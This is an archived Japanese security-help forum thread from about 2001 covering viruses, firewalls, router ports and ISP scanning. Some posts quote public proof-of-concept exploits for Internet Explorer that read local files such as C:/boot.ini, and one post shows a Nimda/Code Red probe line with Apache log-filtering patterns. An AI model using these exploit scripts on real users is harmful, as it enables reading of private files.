http://www.cyberoz.net/faq/cgi1.html

>>429
即レスありがとうございました。
私の無知だったのですね・・・・
もう少しちゃんと勉強するようにします(^^;;;

Ｈなサイトなどをまわって動画をおとしたあと、
よくノートン先生が「ブートレコードが変更されています」と
教えてくれます。ログはこんな感じ↓です。

ﾄﾞﾗｲﾌﾞ C: のﾌﾞｰﾄﾚｺｰﾄﾞは予防接種後に変更されています｡
ﾌﾞｰﾄﾚｺｰﾄﾞは修復されました｡

このような症状がおきる原因はなんだとおもわれますか？
キチンとＩＥのセキュリティ関連の設定はすべてオフに
しているのですが・・・。

>>431
あと、ウィルススキャンも異常なし。ウィンドウズアップデートなども
済ませました。

>>431
ブートレコードを変更するプログラムを自分で動かしてるとか…。
（各種マルチブートツールなど）

>>433
いえ。出るのはきまってエロサイトにいった直後に
ウィルスチェックをした時なんです。
マルチブートツール？というのも使用していません。（win98seしか
いれてません。）

私もいま先ほど、同じ現象に遭遇しました。
エロサイトに逝った直後ではありませんが。

詳しくいうと、樹璃無形式のファイルを結合したあとに、
一緒にＤＬしたほかのファイルも合わせてチェックするように
してるんですが、ちょうどそのときにいつも上記のような警告がでます。
JavascriptやJavaなども切ってるんですが、それでもブートレコードを
変更できるんでしょうか？

（修復すればなんともないようなのですが・・・）気になります。

このレスは権利侵害の申し立てや違法もしくはその疑いにて不可視または削除されました。
削除日時：2011-10-29 22:51:14
https://mimizun.com/delete.html

>>436
ん〜。あるとしたら、その樹璃無ってソフトがそーいう行動をしてるってぐらい？
バグかもしれんし、作者に問い合わせてみたら？（無実かもしれんし穏便にね）

メルコのBLR-TX4と言うルーターを使っているのですが
MSNメッセンジャーでファイルの転送が出来ません、何のポートを
Openすればいいのでしょうか。

>>439
TCP：1024-65535
UDP：1024-65535

>>440
本当にありがとうございます
今すぐ設定してきます

数分たつと　使われていないポートは閉じられてしまうのですが、
もしかすると、それが原因なのでしょうか。

今は
TCP：1-65535
UDP：1-65535

にしています。

>>442
ルータのファームを最新のものにしないと5分で切れるよ

>>443
最新のものにしています。
ただ、ファイルの転送がどうしても出来なくて
困ってます

>>444
「音声通話機能/ファイル転送はご利用できません」だと。

>>445
やっぱムリなんか、
メルコのルーターなんか買うんじゃなかった。
このスペックで4千って怪しいと思ったんだよ。
梅田ヨドバシの人　こんなんすすめてくるなよぅぅ。。。

>>444
あとはDMZを使うしかないか。

>>447
DMZにLAN側IPを設定すればいいのですね

ファイアウォ−ルについての質問です。セキリィレベルを「高」にするとIEもOEも
使えなくなってしまいます。
接続中なのに「接続してください」みたいなメッセージが出るのですが…。

>>449
何を使っているかとか全然情報がないんだけど。。。
Zone Alarmとかなら、ローカル中、インターネット高が
デフォルトで、大体それで問題ないはずだが？
もちろん最初の頃は、設定していなかったソフトごとに
問い合わせをしてくるけど、そのつどOK出してやればすむことで。

>>449
ああ、そうそう、代表的はファイアウォールソフトには
大体それ専用のスレがあるし、相互スレもあるんで、
そっちを読むなり質問する方がいいかと思う。

XP&ZONEの質問。
Generic host process for Win32 Service
というのが3つアクセスしてるんですけど、なんなのでしょうか？。
そのうち、二つが共有設定（手のﾏｰｸ）
以下詳細
�@TCP5000：UPD1900
�AUPD：1026
�B共有設定じゃない。

止めるとネットに繋がらないし、
勝手にアクセスしてるのが、ちょっと怖い。
ノートンでウイルスチェックしても問題ありません。
なにか問題あったら教えてほしいです。
よろしくお願いします。

>>452
UPDじゃないUDPだ！
http://homepage2.nifty.com/winfaq/wxp/network.html#754

>>453
どうもありがとう。
UPD・・・・・は・・・UDP・・・・
恥かしい・・・・・・
勉強します。
にしてもホントにありがとう。

Yahoo!BBにしたら、他人から勝手にファイルを共有されることがあるんです。
zonealarmインストールしてみた。
これはブロックしてくれた、ってことなのでしょうか？
日本語化しとけば良かった。

http://www7.big.or.jp/~mb2/bbs/up/img-box/img20011222103041.gif

>>455　辞書引いて調べましょう。

↓ここの>>1をよく読みましょう。
ZoneAlarm　Part3
http://pc.2ch.net/test/read.cgi/sec/1006399748/

初心者ですよろしくお願いします。
Ｘ97Ｍ　ＬＡＲＯＵＸＺＮというウイルス
に感染しているようですがウリルスバスター
2001で駆除できず隔離も失敗します。
よい駆除方法はないでしょうか？

ウリルスバスター！！！

>>457
ラルーならそのトレンドマイクロのページに特別に駆除方法が
書いてあるからまずそっち読んでから質問すべきだろ。

>>438
いえ、樹璃無を結合してる詩子は関係ありませんでした。
というのも、毎回毎回余計なことしやがってこの野郎と
思って削除したんですが、他の結合ソフトでもなりました。
あと、結合する前に（サイト閲覧直後）もなりました。

>>460
もう少し状況を整理してからカキコしてくれい。
結合ソフトはシロなんだね？
特定のサイトのみの閲覧で100%再現するのだね？

>461
すいませんでした。
そうです。どのサイトか特定はむずかしいのですが（数が多くて）
２週間に一度ぐらいのペースでお気に入り全部チェックしたときにおこります。

win98ＩＥ５．５ｓｐ２
セキュリティパッチ・設定などはちゃんとしてます。
これでも簡単にブートレコードを書き換えられるような技術が
あるんでしょうか・・・・・。
もしかしたら、分割ファイルに仕掛けがあるんでしょうか・・・。

>>449
まさかあんたAOLじゃねーだろうな？

>459 ”そっちに書いてあるよ”でいいんだよ。

久々にコンパネのアプリケーションの追加と削除みてみたんだが・・・
絶対に自分で入れてないし、使わないlanguage supportがたくさん入ってる。
arabic,chinease,hebrew,thai　等・・・
これってなんだろ？勝手に入るもんじゃないと思うんだが・・・
踏み台とかじゃないよね・・・

あとC:\WINDOWS\TEMPに変なのがあったYO
KillMe
MS-DOS アプリケーションへのショートカット
967バイト　　拡張子　PIF
コマンドライン　C:\windows\TEMP\KillMe.bat

オンラインウィスルスキャンにひっかからず、
環境　ADSL　ルーターなし　ゾヌ入ってます。
なんかヤバイかな？

>>465　そのバッチファイルの中身をアップしてみれ。

>>466
CドライブをKillMe で検索したけど、そのショートカットしかないみたいなんですが・・・

>>467　それじゃあ起動できないんだから関係ないと思われ。

もちろん隠しフォルダ内も検索したんですよね？

>>468
WIN98です
サブフォルダも探すにチェックが入っています。
検索で名前と含まれる文字列　KillMeでやっていました。
いいのかな？

今一応、検索やり直してます。
含まれる文字列　KillMe のみで検索するといろいろひっかかってます。
意味ないかな・・・

>>465
そもそも、language supportは Ieのセキュリティ設定によっては
自動でダウンロード＆インストールされるんだけど、そのへんはどうなの？

>>470
ありがとう　思い当たるのはIE６にした事かな。
IE5.5の時は確認の画面が出ていました。
IE6にして、まだそんなに使い込んでいないけど、そういった画面見てないですね。
自動でダウンロードされてるのかな？設定は5.5とほぼ同じだと思います。
ちなみにフォントのダウンロードはダイヤログ出す設定です。（フォント関係なかったらすいません）

アラビア、タイ、ベトナム語のサイトに行った記憶もないですし・・・
けど、どっかでたまたま見たとしか思えないですよね・・・そう思いたいです。

わけがわかりません。
新しいマシンがＸＰproでとりあえずマカを入れた。
ついでゾヌの2.6.362を入れた。
で、マカフィーが嫌いだから、ノートンシステームワークス2002の
アンチウィルスを入れたら、ゾヌのプログラムの接続許可に全て×がついているんです。
マカのときはそんなことなかったのです。
９８でゾヌとアンチウィルス2001を併用しているときも問題なかったです。
ネットなんかはできています。
XPのFWは切っています。
インストール手順はマカをアンイントールしてからノートンを入れました。

過去レスで見つからなくて（見つけられなくて）。
教えてくんですみません。

ttp://www.vwalker.com/news/0112/21_microsoft_b/21_microsoft_b.html
もう IE6SP1ベータ配布してたんだ。。ｶﾞｲｼｭﾂ？

プロバイダ側は僕が何処のサイトに繋いだかは分かると思うのですが
僕のパケットを盗んでどんなファイルをDLしてるか、
どんな文章を投稿したか、などは分かるのでしょうか？
お願いします。教えて下さい。

ところで、知るわけない他人のパスワード適当に入力して、
拒否されて、「そりゃ無理だわな」っていうのは、
不正アクセスになるんですか？

>>475
万が一繋がると不味いかも。
繋がらなくても繰り返せば、、、、警告来そうだな。

一回きりなら大丈夫ですよね。
一度やってビビッたので。
ログはとられたけど。

>>477
ところで、って軽く話題に入ってたけど、内心ビビッてたんだね。（ｗ
心配しなくても大丈夫だと思うよ。政府機関とか怪しいサイトでなければ。

>>471
ランゲージサポートは、
詳細設定の「インデマンドインストール」のほうだと思うよ。

www.top.or.jp/~godhand/a2.html

↑これ、どなたか調べていただけませんでしょうか？

>>479
ありがとう！
見てみたら、有効にチェックが入っていました。m(._.)m
これが原因ですね。安心しました。あいがとう。

>>480
飽きた。

>>480
そのリンクを　右クリック＞対象をファイルの保存＞好きなテキストエディタで開く
分からなければ勉強する。

本当に宜しくお願いします。
もしかして全くアホらしい事を私は聞いているのですか？

技術的には可能

SHIELDS UPのPORTチェックでRPCがOPENと言われました。
これはどうやって閉じることができますか？

ファイアーウォールを入れていれば安全でしょうか？

>>474
ネット上での振舞いは現実生活の振舞いより捕捉されやすいと思っていいよ。
絶対にどこかに足跡は残る。
海外プロバイダにして、串使って、用が済んだらパソコン捨てるくらいすれば
いいんじゃない？ｗ

プロバイダの社員が個人的にやったら犯罪？
じゃ無くてもそんな事やっていいの？
セキュリティー板だからやっぱそういうのに詳しい人
どっかの社員とか居るんじゃないの？
なんか怖くなってきたんでもう
ネットにはあまり書き込んだりしないようにします。
教えていただいてありがとう御座いました。

>>474
違う意味でそのほうがいいよ。
あと病院行きな。

>>488
なんでそんなに脅えてるの？

>>489-490　下記参照のこと　HN=207

ZoneAlarm　Part3
http://pc.2ch.net/test/read.cgi/sec/1006399748/

なんだ、やましいことがあって脅えてるだけか。自業自得じゃん。

>>486教えていただけますか？

凶悪ハッキングについてこレだろ。
http://www.puchiwara.com/hacking/

セカンドマシンとして買う予定のNote（NEC、WindowsXP）にマカフィが
プレインストールされているようなので、アンインストールして他のものを
入れようと思うのですが、NAV2002単体＋Zone Alarmという組合せで
何か問題ありますか？

メインマシンではVB2002（FW機能オフ）＋Zone Alarmで問題なし、
接続はルーター経由CATVです。（またVBにしても良いんだけど、NAV
の方が少し安いので）

>>Zoneはいいけど重い、設定できるならTiny

1

ニュース速報板のスレ

新型ウィルス発見 今度はオフィス
http://choco.2ch.net/test/read.cgi/news7/1009233792/l50
　　　　　　

セキュリティと少しは関係あると思うんですが、
ＺＩＰ圧縮のファイルでＰＡＳＳ付きのを落としました。
PASSは「ｸﾘｽﾏｽ｣だと言われました。そのままカタカナで入れろ
と言われましたが、PASSを入れるとなると、カタカナもくそも
ないですよね？これはどういうことなんですかね。
わかる人いましたら教えてください。

>>498
思わず騙されたＹＯ！／ｗ

昨日友人からクリスマスカードがきました。
英語のＨＰ上にあるサンタ動画なんですが
それ以降、ＷＩＮＤＯＷＳファイル内に不明のファイルがあります。
動画＝不明のファイル？（５４ＭＢ）と思ってみようとしたら
開くソフトを選べと出たのでアクロバットリーダーを選んでしまいました。
その後、共有が違うので開けません、が出ます。
そのファイルの拡張子は、．ＳＷＰです。
何の略でしょうか？

ウィルススキャンしても何も出ませんが、不明なファイルだけに不気味です。
他のファイルに比べて大きいし、削除しようとしてもゴミ箱に入りきらず、
もしくはプロテクトがかかっています、と出ます。
パソコンに詳しくない人はＷＩＮファイルを触るな、といわれているのですが
気になるので、このファイルを削除してもいいものかどうか教えてください。

>>499
マルチポストはダメ

>>500
＞それ以降、
とあるけど、それ以前から存在していないと言い切れるかい？

>>500

拡張子辞典
http://www.jisyo.com/viewer/index.html

【検索の基本を覚えるスレッド】
http://pc.2ch.net/test/read.cgi/pcqa/1008241748/1-9

☆★質問の前にこのＦＡＱ集を見てね★☆12/12
http://pc.2ch.net/test/read.cgi/pcqa/1008114495/1-7

優しい人がレスしてくれるスレッド Ver111
http://pc.2ch.net/test/read.cgi/pcqa/1009205473/

>>502-503
ありがとう！でも探したけどなかったです・・・
ヤフー検索もしてたんですが、そこにもなくダメでした。
こんなに拡張子があるなんて！

さきほどＷＩＮファイルを見ると、なぜか７８ＭＢに増えていました。
ですので、なんか一時的なファイルなのかな？？？？？
とりあえずありがとうございました。
しばらく様子見にします。

Windows XP home で、起動後ログイン直後（音楽が流れている途中）でいきなり
ブルースクリーンが一瞬だけ出て、リブートしてしまったあと、MSに報告をしたら、
MSの報告サイトの電子証明書の有効期限が切れている警告が出ました。

とりあえず、表示されている内容を手で書き写しておきますです。打ち間違い容赦。

発行者：Secure Server Certification Authority, RSA Data Security, Inc., US
有効期限の開始：2000年12月9日
有効期限の終了：2001年12月10日　……ｺﾞﾙｧ!!
サブジェクト：ocajapan.rte.microsoft.com, Windows, Microsoft, Redmond, Washington, US
公開キー：RSA(1024 Bits)

>>505
そのサイトです。ごらんくださいませ。

https://ocajapan.rte.microsoft.com/welcome.asp

バッドトランスＢっていうウイルスに感染したようです
なんか勝手に他人にウイルス撒き散らしてるようです
どうすれば直るの？

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_BADTRANS.B
自分でも調べろ

最近外部からワークグループ名に知らない物が、、、。

MX一度やったのですが、おそらくコレが原因と思ってますが
やめたいのですが
どうやったら削除できるのでしょうか。
クリンストしてもまた復活
どうしましょう？

OSクリンスト

Internet Explorer 6 Allows Local File Reading (XMLHTTP)
http://www.securiteam.com/windowsntfocus/6W00D2K3FS.html
http://www.xs4all.nl/~jkuperus/bug.htm
<html>
<head>
<title>Exploit</title>

<scr!pt language="jscript">

function doIt() {

// open the file on the users harddisk using a http redirect

var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt", false);
xmlhttp.Send();

alert(xmlhttp.responseText);

}

</script>
</head>
<body>

<button onclick="doIt()">Do it</button>

</body>
</html>

質問です。
教えてくださーい！！
PINGの意味ってなんですか？
それからPINGされると結局どうなるの？
教えてくださいねー♪

http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20011217_ms01-058
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20011204_ie55-ext-spoof
http://www.st.ryukoku.ac.jp/~kjm/test/readme.txt
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
−−−−−
2ch でIE のセキュリティホールをつく「fusianasanトラップ」が蔓延
https://www.netsecurity.ne.jp/article/1/3581.html
http://java-house.jp/ml/archive/j-h-b/032585.html
http://memo.st.ryukoku.ac.jp/archive/200112.month/2392.html
<script>
var x=window.open('file://C:/boot.ini');
x.navigate("javascript:alert(document.body.innerText)");
</script>

>>512
いいですよー♪
http://www.google.co.jp/search?hl=ja&q=%8E%BF%96%E2%81%40Ping%81%40%88%D3%96%A1%81%40%89%BD%81%40%82%C7%82%A4%82%C8%82%E9&lr=on&btnG=Google+%8C%9F%8D%F5

今、不思議なメールが来ました。
差出人のアドレスがなくて、添付ファイルがついてます。
きっと、ウィルスなんだなー。と思ったのですが、
差出人のアドレスがわからないところが不思議でした。
どういう仕組みか御存じの方がいらっしゃれば教えてください。

>>515
まあ、Hybrisだろう。

差出人を空欄にしてメールを出している。
もはや疑問の余地もないほどに単純明快だけど？

あー？そうかー。
516さんありがとうー。

以前ケーブル接続にしたとたん、
ISPからportスキャン掛けられ、rootで入ろうとしてきた。
もちろんport変えて上げてるapacheもばればれ、、。
ISP曰く「どんなサービスを上げてるか把握するため」だって、、
ISPって所詮そんな物？

WANに向けて空けてる俺も悪いが、、、、

vipw root:*:すれば安心
portスキャンは仕方ないけど、いきなりrootってやだね。分かるけど。

>>519
vipw うんぬんはしてるけどね。
rootノンpassかと思ったのだろうか？
一応ISPに文句は言ったけどね。

>>518
ちなみにどこのプロバイダー?

>>518
「どんなサービスを上げてるか把握するため」って凄い言い訳ですね。
そのようなプロバイダは信用できません。
第一ISPとしての守秘義務を忘れているのでは？
もし顧客を把握したいなら申告してもらうか、
予め告知をするのが最低限のルールってものです。
どこですか、その酷いプロバイダは？

>>521
>>522
地方の某電力系のISPです。
私はそのISPへルーターPCをケーブル接続２４時間繋いでるので
文句もほどほどにしてます。
でも、dhcpcでもらったドメインと別だかえら
（営業はCATV会社保守はそのISP）
とりあえず、そのISPのドメインからのパケットは蹴ってます。

しかし、自分の所の客なのによくやるわって思う。
Winな端末入れてる人は気づいてないのかな？

余談だけど、別件で警察の「生活安全課」と話してた時
この件聞いたけど、「聞いたこと無い、弁護士と相談して」だって
こんなものか、、、

>>523

ISP名はっきりさらしていいと思うが

でわそのプロバイダの言葉をひっくり返すならば
ISPがどんなサービスやってるかをさぐる為ポートスキャンしまくり
rootでトライトライでくらっキング大会してもいいわけですね
そのISP内は、、わりと楽しそうだのう。

>>523
うううさんが言うように、そのISPを公表してもいいと思いますよ。
ただパケットもドロップしているし、
気にならないのであれば無視するしかないのかもしれません。
ここら辺のことで国民生活センターが動くとも思えませんし・・・
http://www.kokusen.go.jp/

2ちゃんねるに公表して、プロバイダに姿勢を正させるのもひとつかな。

>>524

# whois stnet.co.jp
[ JPNIC database provides information on network administration. Its use is ]
[ restricted to network administration purposes. For further information, use ]
[ 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, add '/e' at ]
[ the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Domain Information: [ドメイン情報]
a. [ドメイン名] STNET.CO.JP
e. [そしきめい]
f. [組織名] 株式会社 四国情報通信ネットワーク
g. [Organization] Shikoku Information & Telecommunication Network Co.,Inc.
k. [組織種別] 株式会社
l. [Organization Type] Corporation
m. [登録担当者] YK235JP
n. [技術連絡担当者] TK2142JP
p. [ネームサーバ] ns1.stnet.ad.jp
p. [ネームサーバ] ns2.stnet.ad.jp
y. [通知アドレス] [email protected]
[状態] Connected (2002/03/31)
[登録年月日] 1996/02/07
[接続年月日] 1996/02/08
[最終更新] 2001/03/28 12:21:35 (JST)
[email protected]

こいつです。

# whois netwave.or.jp
[ JPNIC database provides information on network administration. Its use is ]
[ restricted to network administration purposes. For further information, use ]
[ 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, add '/e' at ]
[ the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Domain Information: [ドメイン情報]
a. [ドメイン名] NETWAVE.OR.JP
b. [ねっとわーくさーびすめい] ねっとうぇーぶいんたーねっとさーびす
c. [ネットワークサービス名] Netwaveインターネットサービス
d. [Network Service Name] Netwave Internet Services
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] SN3365JP
n. [技術連絡担当者] YI122JP
n. [技術連絡担当者] HH404JP
p. [ネームサーバ] ns1.netwave.or.jp
p. [ネームサーバ] ns1.iij.ad.jp
p. [ネームサーバ] ns1.stnet.ad.jp
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[状態] Connected (2002/03/31)
[登録年月日] 1996/02/23
[接続年月日] 1996/03/19
[最終更新] 2001/10/30 10:52:39 (JST)
[email protected]
#

こいつが、>>526の下流。
５２６にやられた、、、。

>>523

その会社のweb serverポートスキャンしたらわりとニヤリ
顧客のポートスキャンする前に自分んとこもっとしっかりやれ厨房って感じ
このSolarisいつまでつかうかねぇ。

>>526
528はnetwaveだけど。
stnetはIISっぽいなしかも3.0とか古いやつ。
つか両者ともダメコンボでしょう。
528はしっかりしてるからイイんじゃねーのー。

攻撃できるもんならやってみな [email protected]

>>530　遊んでないで冬休みの宿題やれ。

>>528
地元では有名なセキュリティーが甘い業者。。。
以前ハクられて、某ＨＰに顧客のアカウントとＰａｓｓが
出た事あったような、、、2-3年前だけど。

>>532
結論として、523は己の道を行け、厨房ISPは自滅すれ
自滅の手伝いは523が2chですれば良いという事か。

http://www.asahi.com
朝日新聞社　クラッキングされた？

>>534　はぁ？

211.239.89.237 - 192.168.0.*** 80 GET /scripts/root.exe /c+dir 403 -
毎日毎日こんなのが現れてうざったくてしょうがない
のですが、何か対策ないですか？

>>536
APACHEか?
APACHEだったら httpd.confでlogを切り分けろ

SetEnvIf Request_URI default\.ida code-red
SetEnvIf Request_URI default\.ida bad_log
SetEnvIf Request_URI cmd\.exe iis_cmd
SetEnvIf Request_URI cmd\.exe bad_log
SetEnvIf Request_URI root\.exe iis_root
SetEnvIf Request_URI root\.exe bad_log

CustomLog /usr/local/apache/logs/access_log common env=!bad_log
CustomLog /usr/local/apache/logs/codered_log common env=code-red
CustomLog /usr/local/apache/logs/iis_cmd_log common env=iis_cmd
CustomLog /usr/local/apache/logs/iis_root_log common env=iis_root

>>537
う〜ん、IISなんです。
最近はこんなLOGのほうが多いくらいで・・・

IISは知らないのだが
/scripts に root.exeというアプリ作って
そのつどrouterのblock IPに追加させるようにしとくとか
どうよ。

なるほど、ルータでブロックですか。
でも、馴れないことして正規のものまで
ブロックってのが怖くて、なかなか・・・
じっくりルータの取り説でも読んでみます。

>>540
へ？
root.exeに正規のアクセス？？

ちがう、ちがう。
設定をミスってブロックしなくてもいいもの
までもって事。
なにせ沢山のＩＰが入り込んでいるから全部
追加ってことだとかなりの数になるし。

IISは知らないが
リスクを負いたくなければ
IISでもログの切り分けぐらいできるんじゃないの?
もしダメだったらログを回すときにスクリプトかませて
ニムダ系のやつをカットしてしまえばいいんじゃないかね

バーチャルホストでログが別途で出きるんだったら
やつらはIPでhttp引きに来るからその分をバーチャルにしてしまえば
問題ないと思うのだが。

うううさん、いろいろ親切にどうも。
やっぱりログの整理でやってみます。
ルータでブロックってのもいいかと思ったのですが
やっぱりいじらないでおきます。
なにかIIS用のいいログ整理ソフトでもないか
ベクターにでも行って探してみます。

■□■□■□■□■□■□■□■□

荒らし依頼所


http://www2.aaacafe.ne.jp/free/kgy999/main.bbs


あなたのＨＰも依頼されてるかも（笑）

■□■□■□■□■□■□■□■□


l@@l@n opppo

昨日からセキュ板に入るとマカフィーが作動。
｢ＪＳ　ＩＥ／ＳＴＡＲＴ｣(昨日）と
｢ＶＢＳ　Ｇｅｎｅｒｉｃ＠ＭＭ｣(今日）に感染しています。
駆除→駆除できないので削除しました。
ちなみにインターネット一時ファイルを全削除してから
スキャンかけると何も出ない。
シマンテックのオンラインスキャンは、Ｄドライブのゴミ箱
ファイルで止まってしまうので、それ以降のファイルはスキャンできない。
（ｃは大丈夫みたいです）

ここのどこかにウィルスをしまっている？ってこと？
それともマカフィーが誤作動？気になるので教えてください。
（ちなみに他板ではありません）

>>546
「VBS_GENERIC」のウイルス名は特定ウイルスの検出を意味するものではありません。使用中のパターンファイルでは対応されていないウイルスの危険性があるVBスクリプトのプログラムが発見されたことを示します。
したがって、このウイルス名でのウイルス検出には以下の3通りの可能性があります

１）今までに発見されていない新種、変種、亜種のVBSウイルスの検出
２）実際には不正な活動ではないがウイルスと似た動きが認められるVBSコードに対する検出（誤警告）
３）VBスクリプトと似た文法を持つ、VisualBasicのソースコードやVBA(VisualBasic for Application)のマクロコードに対する検出

>>545
その無料掲示板の規約にはアングラサイト使用禁止と
あるので、サポートにメルしといた。

家に帰ってPC見てみると、ノートン先生の
「トロイの木馬の攻撃をブロックしました」
とかってゆーウインドウがあってﾋﾞｯｸﾘ。
で、IPから調べてみたら韓国のISPでした。
なんかやられっぱなしもシャクなんで、メールでも送りたいのですが
どんな文面で抗議すればいいんでしょうか？
抗議メール用のひな形みたいなモノとかあったら教えてください。

>>549　今度はウィルス付きなのが送られてくるぞ。スキルが無いのならやめておけ。

>>550
ううう。じゃコタツに入って泣きながらミカンでも食べてます。
ありがとうございました。

>>549
検索すればそれなりに出てきたが。

>>550
ISPに対しての抗議だからそんな事はまず無いと思われ
まさか直接相手のメアドが分かるハッカーなら別だが（w

>>552　まーな。しかしISPもピンキリ、ましてや韓国だからな。

2ch型掲示板にはどれぐらい穴がありますか？
あったら教えてください。
下にリンクがあります。
おしえてけろ。ｋｋ

2ch型マイナー掲示板「はにちゃんねる」
http://www.isn.ne.jp/~honey/honeychannel/
みんなリンク＆紹介よろしく。

>>554
宣伝うざ

今日メールが着ていて、それに添付されてたファイルを開いてしまったら
ウィルスに感染してしまいました。ＰＣにインストールされているノートンのver5.0
で除去しようとしてもなぜかできません。検疫、修復もです。そのファイルを普通に
削除しようとしたら「ＷＩＮＤＯＷＳで使用しているので削除できない」っとなってしまいます。
ウィルスはの種類はＢａｄｔｒａｎｓで
ＯＳはＷＩＮ98ＳＥです
よろしくお願いします。

>>557
正確な削除の仕方はトレンドマイクロやシマンテックのサイトに載ってる。

突然クリスマスカードですと言って下記の内容の
カードが届きました・・・・危険でしょうか？
アドバイスお願いします

Dear Sirs,

We are glad to congratulate you with the birthday of His Imperial Majesty
Akihito! We'd like to join the people of Japan in their happiness - we know
that Princess Toshi - a new ray in the Country of Rising Sun was born!

We wish Her Imperial Highness the Princess to be safe and sound. We wish
ever lasting prosperity to your country and people!

With great respect,
administration of "Russian Information Network

>>550 ＆ >>552>>553
>「トロイの木馬の攻撃をブロックしました」
これって、一つのポートに対してSYNパケットが来ただけでしょ？
そんなんで抗議してたら、藪を突ついてなんとやら…ですよ。

>>559
炭疽菌に注意しなさい

＞＞５６１さん　マジですか？

>>560　？　レス先が間違って無いか？

シマンテックのサイトには「W32.Badtrans.13312@mm.　として検知されたすべてのファイルを削除してください。」と
かかれていたのですがＷ３２．Ｂａｄｔｒａｎｓ．Ｂ＠ｍｍに感染しているKernel32.exeとkdll.dllのファイルがどうしても
削除できません（Ｋｅｒｎｅｌ３２．ＥＸＥはＷＩＮＤＯＷＳが使用中、kdll.dllはライトプロテクト）

すいません↑は557です

>>559
添付ファイルがあれば怪しいね。
でもいい英文だね。

>>564
こっち↓
http://www.symantec.com/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html

>>566様
お返事ありがとうございます。英語わからなくて。。意味は
いまいち不明なんですけど。最初に来たメール今探してみますので
もう一度アドバイス頂けるとうれしいです。　５５９

>>567
すいません似たような名前で間違っていました。
なんとか駆除できました。
どうもありがとうございました。

掲示板の管理PASSを見つけるツールはありますか？

>>570　あったらどうしようというのだ？つまらん事聞くな。

>>568
アイボ…　じゃなくて愛子様（だっけ？名前憶えてないやい）についての
お祝いメッセージのようですね…

メッセージ部分の危険度は天皇制に洗脳されるぐらいのことです。

>>570
あるんではないかい、場所は知らん。
でもそんなもん使うと、掲示板ＣＧＩとかに負荷掛けそうだからそれだけでもヤバイ
事になるかも…

http://kaba.2ch.net/test/read.cgi/net/1009458920/
ネトヲチでこんなスレが立ってるけど、携帯メールのUIって盲点だったかも。
漏れは携帯持たないんで確認できんのだが、Reply-Toつけられた時に誰に送ろうとしているか
はっきりわかるUIになってるかい?

スレ違いかもしれませんが教えてください。

知人から聞いた話なのですが、
うちは、CATVでのインターネットで
172.16.35.***　というIPが割り当てられています。
これはローカルだと思うのですが、

私が、グローバルをとらないと鯖をたてれないかときいたら、
いまのルータは仮想のグローバルを作って鯖がたてれるという
話を聞いたのですが、果たしてルータでできるのでしょうか？

詳しいお方いらっしゃいましたら教えてくださいませ。

＞＞566様　>>572様
来たメールがこういうので当然だったので。。。
その後ノートンが感染の可能性がありますと
警告を出し、ウィルスチェックは終わったのですが
問題ないみたいな表示になりました。
DMだったのかも知れず質問してしまいすいませんでした。
回答ありがとうございました>>572様

チェックに時間がかかってしまってすいませんでした

届いたメール↓
Hello,
You have received a postcard from http://postcards.rin.ru

You can see it here:
RECEIVE
http://postcards.rin.ru/postcards/post/imp.html
A postcard will be kept 1 mounth

Virtual postcards on POSTCARDS.RIN.RU
We invite you to visit Russian Information Network

最近３ｋの添付がついた英文のメールを受け取るのですが、
これはウイルスなのでしょうか？
バスターにもひっかからないし、
中身が知りたいのですが開けるわけにもいかないので。

本文は開けずに削除してしまっているので貼ることはできないのですが…
ご存知の方いらっしゃったら教えてください。

スタンドアローンのPCを用意して開けてみる。

>>577
MAILER-DAEMONからって事はない？

>579
うわ・・・そうかもしれません・・・
というかそれっぽい・・・
次にそのメールが来たらがあればきちんと確認します。
本当にありがとうございました。

>>580
もしそうなら安心していいよ。
俺も添付ファイル付きで
MAILER-DAEMONから受け取った事あるし。

これも参考にして。
http://www.void.tako.org/mail/address.html

>>576
http://postcards.rin.ru/postcards/post/imp.html

を見に行って下のsend postcardってボタンを押せばポストカードの選択画面に
行きますからこりゃ上記のサイトの宣伝メール（spam）というやつですな。
only your textって言うやつを選べば独自の文章を送れそうですが、
日本語は文字化けせずに送れるかは怪しいのではないかと思います。
ついにロシアからspamが来るようになったか…

>>580
メールのソースを見てみるともう少し事情がつかめるかも

>>547
どうもありがとうございました。
今日は無事何事もなく来れました。
新ウィルス？ではなく、２か３の可能性がありそうですね。
詳細がわかりませんが、気をつけつつ使うことにします。
ウィルス＆セキュ板に来てから、ものすごく勉強している気がします。
ここに来られないだけで不安がありましたし（ｗ　メーカーのサポートは×）
ありがとうございました＜ＡＬＬ

>>584

結論からいうとウイルスのソースを書いたスレッドがそこかしこに
あるのでそれに引っ掛かってるだけ。

sygateをいれたら、桜時計が使えなくなってしまったんですけど、
どうすればいいんですか？

>>582様　ありがとうございました

アンチウィルスソフト会社がウィルスをばらまいている可能性はないのですか。
アンチソフトを導入せずに、ウィルスに対処する方法を教えてください。

>>588
無いとは言い切れないが、可能性は極めて薄いだろうな。
外部と接続・接触しない。完全スタンドアローン化。完全フォーマット。

>>586
自分の桜時計で使うUDPポートを空けておけ。

>>588
OS作ってる会社がトロイ仕込んでる可能性も否定できないのでOSも自分で作れ。
コンパイラも怪しいコードを出す可能性もあるからハンドアセンブルでモニタ焼くところ
から始めるんだぞ。
おっと、CPUにも何か仕込まれてるかも知れないからトランジスタ1000万個くらい
買ってきてCPUも自作しないと…

>>591　>>588はマッチポンプの事を言っているのだと思われ。

題名は無くて、Received: from oemcomputer (oemcomputer)ってとこから
添付「MIPMLPMI.EXE」がついてくるメールが着たんですが
これって何のウイルスですか？

>>593
Hybrisじゃないの？

http://hpcgi1.nifty.com/~naotosi/zatubun.pl?s=7&b=50
http://www.ipa.go.jp/security/y2k/virus/cdrom/topic/2_13.html

サンクス。あとでコレクションに入れときます。

>>588
＞アンチウィルスソフト会社がウィルスをばらまいている可能性はないのですか。

